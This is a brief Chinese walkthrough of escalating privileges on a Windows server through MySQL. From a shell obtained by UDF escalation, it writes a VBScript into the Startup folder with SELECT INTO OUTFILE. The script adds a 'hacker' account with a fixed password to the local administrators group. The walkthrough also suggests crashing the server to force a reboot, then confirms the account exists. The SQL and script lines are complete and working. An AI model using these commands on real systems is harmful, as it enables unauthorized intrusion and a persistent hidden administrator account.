• 开机启动项提权原理:利用mysql,将后门写入开机自启动项。同时因为是开机自启动,写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限甚至是system,可以利用一些漏洞尝试打蓝屏重启)
• windows的开机启动地址:
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
1、利用UDF提权得到的shell
UDF提权的到的shell
2、创建表create table dota(cmd text);
创建表
3、插入数据insert into dota values("set wshshell=createobject(""wscript.shell"")"),("a=wshshell.run(""cmd.exe /c net user hacker admin@123 /add"",0)"),("b=wshshell.run(""cmd.exe /c net localgroup administrators hacker /add"",0)");
插入启动脚本数据
4、写入开机启动文件select * from dota into outfile " C:\\Users\\Administrator.WIN702\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\adduser.vbs";
写入开机启动文件
5、查看开机启动文件
查看开机启动文件
6、重启开机启动
开机启动
•开机启动,发现 hacker 账户已经增加成功
,
